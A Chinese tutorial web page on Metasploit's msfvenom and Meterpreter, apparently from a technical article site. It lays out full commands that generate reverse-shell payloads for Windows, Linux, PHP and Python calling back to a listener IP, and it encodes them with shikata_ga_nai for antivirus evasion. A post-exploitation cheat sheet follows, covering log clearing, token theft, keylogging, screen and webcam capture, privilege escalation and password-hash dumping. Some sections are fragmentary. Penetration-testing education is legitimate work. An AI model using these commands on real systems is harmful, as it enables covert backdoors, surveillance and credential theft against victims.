栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解

未经授权禁止任何渗透测试 本次实验都是在本机虚拟机

抽离 专职生成对应的payload
  • 异或编码 -e x86/shikata_ga_nai -i 3 免杀
  • linux 生成 payload
  • php 生成 payload
  • python 生成 payload
  • windows 生产payload
    • 1. 将自身注入到可信(白名单)进程 可以大大提高session的存活率
  • python 文件不落地
  • msf 后渗透阶段
    • msf命令的具体作用
    • msf文件相关命令
    • msf portfwd转发端口
    • msf portfwd转发端口 3389
    • linux_rdesktop 使用
    • 清除事件日志 clearev
    • execute -f calc.exe 打开应用
    • getpid 查看 进程
    • kill 杀死进程 pkill 根据名字
    • reboot 重启
    • shutdown 关机
    • steal_token [pid] 偷取令牌
    • keyscan_start 键盘监听
    • screenshare 实时监控
    • screenshot 拍照片
    • getsystem 一键shell
    • 密码哈希

常见参数

-l, --list 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,…all

-p, --payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的

-f, --format < format> 指定输出格式

-e, --encoder 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload

-a, --arch < architecture> 指定payload的目标架构,例如x86 还是 x64 还是 x86_64

-o, --out < path> 指定创建好的payload的存放位置

-b, --bad-chars < list> 设定规避字符集,指定需要过滤的坏字符。例如:不使用 ‘x0f’、‘x00’

-n, --nopsled < length> 为payload预先指定一个NOP滑动长度

-s, --space < length> 设定有效攻击荷载的最大长度,就是文件大小

-i, --iterations < count> 指定payload的编码次数

-c, --add-code < path> 指定一个附加的win32 shellcode文件

-x, --template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中

-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行

-v, --var-name < value> 指定一个自定义的变量,以确定输出格式

-t, --timeout 从stdin读取有效负载时等待的秒数(默认为30,0表示禁用)

-h,–help 查看帮助选项

–platform < platform> 指定payload的目标平台

抽离 专职生成对应的payload

异或 编码 免杀

msfvenom -l platforms 支持平台

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f exe -o /home/kali/Desktop/test1.exe

异或编码 -e x86/shikata_ga_nai -i 3 免杀
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f exe -e x86/shikata_ga_nai -i 3 -o /home/kali/Desktop/test2.exe

linux 生成 payload
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22456 -f elf -o /home/kali/Desktop/yui.elf

监听

msf5 > use exploits/multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.226.142
lhost => 192.168.226.142
msf5 exploit(multi/handler) > set lport 22456
lport => 22456
msf5 exploit(multi/handler) > exploit 

执行

./yui.elf

php 生成 payload

生成

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22345 -f raw -o /home/kali/Desktop/phpshell.php


监听

msf5 exploit(multi/handler) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.226.142
lhost => 192.168.226.142
msf5 exploit(multi/handler) > set lport 22345
lport => 22345
msf5 exploit(multi/handler) > exploit 


执行

python 生成 payload

msfvenom -p python/meterpreter_reverse_tcp lhost=192.168.226.142 lport=22441 -f raw -o /home/kali/Desktop/shell.py


监听

windows 生产payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=22441-f exe -o /home/kali/Desktop/shell.exe

background

sessions -i interactive



1. 将自身注入到可信(白名单)进程 可以大大提高session的存活率
  1. 提权
    migrate id
  2. 将自身注入到可信(白名单)进程 可以大大提高session的存活率
  3. 提权


python 文件不落地
f_write = open("./bihuo.txt", "w+");f_write.write("bihuo.cn");f_write.close()





msf 后渗透阶段 msf命令的具体作用 msf文件相关命令 msf portfwd转发端口 msf portfwd转发端口 3389 linux_rdesktop 使用 清除事件日志 clearev

clearev Clear the event log


远程登陆 登录失败

clearev 清除对应的日志

execute -f calc.exe 打开应用

  • H 隐藏



    -i 代表交互式
    execute -H -i -f
getpid 查看 进程

kill 杀死进程 pkill 根据名字


p

reboot 重启 shutdown 关机 steal_token [pid] 偷取令牌

keyscan_start 键盘监听

未经授权禁止任何渗透测试 本次实验都是在本机虚拟机


keyscan_stop 停止

screenshare 实时监控

screenshot 拍照片

摄像头打开

getsystem 一键shell
getsystem 

密码哈希

命令:

hashdump

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/830100.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号